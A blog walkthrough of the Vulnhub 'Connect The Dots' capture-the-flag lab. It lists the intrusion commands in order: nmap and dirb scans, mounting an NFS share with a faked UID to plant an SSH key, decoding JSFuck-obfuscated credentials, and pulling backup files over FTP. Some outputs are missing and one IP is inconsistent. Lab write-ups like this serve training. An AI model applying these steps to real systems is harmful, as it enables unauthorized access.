Vulnhub Connect The Dots Walkthrough

We start scanning the host with : nmap –A –T4 –p- 192.168.1.20 –vv

Running dirb http://192.168.1.20 /usr/sharw/dirb/wordlists/big.txt

There is port 111 so we use showmount -e 192.168.1.20

Now we mount the folder to our machine

mkdir /tmp/morris

mount 192.168.1.120:/home/morris /tmp/morris

But now we can’t do anything as it gave us Permission Denied, let’s create a morris user on our machine so we can copy the ssh file to the host.

ls -ld morris                                                                                                                                                         

drwxr-xr-x 8 1000 1000 morris 4096 Oct 11 14:40 morris

groupadd –gid 1000 morris_group

useradd –uid 1000 –groups morris_group morris

mkdir morris/.ssh

cp ~/.ssh/id_rsa.pub morris/.ssh/authorized_keys

when we try to login using ssh morris@192.168.1.20 –p 7822

it asked for a password , so I guess we have to try another way .

I downloaded all the files I found on the site from pictures to the css , using strings and cat on the pictures didn’t come up with any results, but I found a file bootstrap.min.cs to be wired with a  lot of string coding .. after looking on google for a while I found this site www.jsfuck.com I copied the content of the file without the “” and removed the var= from the file and ran it and it came with:

Now we have another user Norris, and the password TryToGuessThisNorris@2k19

Now going into ftp file we can download the bak files to our machine

ftp 192.168.1.20

Norris

TryToGuessThisNorris@2k19

Mget *.bak

Going into the files with strings command we can see one file game.jpg.bak

It hit me to see it as mores code , decode it online and I got this message

Cd to var/www/html and ls –la

Trying to open the file .sercetfile.swp in the browser then we download it to our machine and strings it gave us:

After enumerating for a while I found we can use tar command , now its easy to use tar as:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s